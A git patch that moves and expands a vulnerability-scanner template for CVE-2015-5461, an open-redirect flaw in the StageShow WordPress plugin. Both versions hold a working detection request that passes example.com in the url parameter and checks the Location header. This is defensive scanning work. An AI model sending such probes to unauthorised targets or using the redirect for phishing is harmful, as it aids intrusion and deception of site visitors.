From c8094b0987c4611bce842441343085e24e0feac8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 3 Sep 2021 09:20:05 +0530 Subject: [PATCH] Update and rename CVE-2015-5461.yaml to cves/2015/CVE-2015-5461.yaml --- CVE-2015-5461.yaml | 20 -------------------- cves/2015/CVE-2015-5461.yaml | 22 ++++++++++++++++++++++ 2 files changed, 22 insertions(+), 20 deletions(-) delete mode 100644 CVE-2015-5461.yaml create mode 100644 cves/2015/CVE-2015-5461.yaml diff --git a/CVE-2015-5461.yaml b/CVE-2015-5461.yaml deleted file mode 100644 index 464a3585f9..0000000000 --- a/CVE-2015-5461.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2015-5461 - -info: - name: StageShow <= 5.0.8 - Open Redirect - author: 0x_Akoko - description: The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. - reference: https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - severity: medium - tags: redirect,cves,wp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml new file mode 100644 index 0000000000..e5416a7c9e --- /dev/null +++ b/cves/2015/CVE-2015-5461.yaml @@ -0,0 +1,22 @@ +id: CVE-2015-5461 + +info: + name: StageShow <= 5.0.8 - Open Redirect + author: 0x_Akoko + severity: medium + description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + reference: + - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + tags: redirect,cve,cve2015,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header